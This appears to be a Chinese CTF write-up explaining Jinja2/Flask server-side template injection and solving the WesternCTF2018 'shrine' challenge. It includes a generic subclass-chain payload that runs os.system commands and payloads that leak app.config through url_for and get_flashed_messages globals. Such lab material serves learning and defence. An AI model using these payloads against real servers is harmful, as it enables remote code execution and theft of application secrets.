SSTI模板注入
之前一直没搞懂ssti,这次简单分析一下
模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程
服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection)
模板渲染接受的参数需要用两个大括号括起来{{}}
模板注入也在大括号里构造
首先看一下python的几个方法:
方法 | 作用 |
---|---|
__class__ | 返回当前是什么类 |
__bases__ | 返回当前类的基类 |
__subclasses__ | 返回当前类的子类 |
还能用数组索引取值
这样就能调用很多类下的很多方法,比如他的__init__函数
如果要在模板中调用os的话,需要先全局注册一下,也就是:
.__globals__(‘os’)
注册了之后就能用os命令执行了,贴一个SSTI的例子:
[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].system('ls')
不过ssti需要知道用的是什么模板引擎,可以参考一下这张图:
[WesternCTF2018]shrine
源码:
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])
+ s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
首先在shrine路径下测试ssti能正常执行
/shrine/{{ 1+1 }}
接着分析源码
app.config['FLAG'] = os.environ.pop('FLAG')
注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
上面这行代码把黑名单的东西遍历并设为空,例如:
/shrine/{{config}}
不过python还有一些内置函数,比如url_for
和get_flashed_messages
先看第一个
/shrine/{{url_for.__globals__}}
看到current_app意思应该是当前app,那我们就当前app下的config:
/shrine/{{url_for.__globals__['current_app'].config}}
第二个是get_flashed_messages
返回之前在Flask中通过 flash() 传入的闪现信息列表。把字符串对象表示的消息加入到一个消息队列中,然后通过调用 get_flashed_messages() 方法取出(闪现信息只能取出一次,取出后闪现信息会被清空)。
总之就是能返回输出了,同理:
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}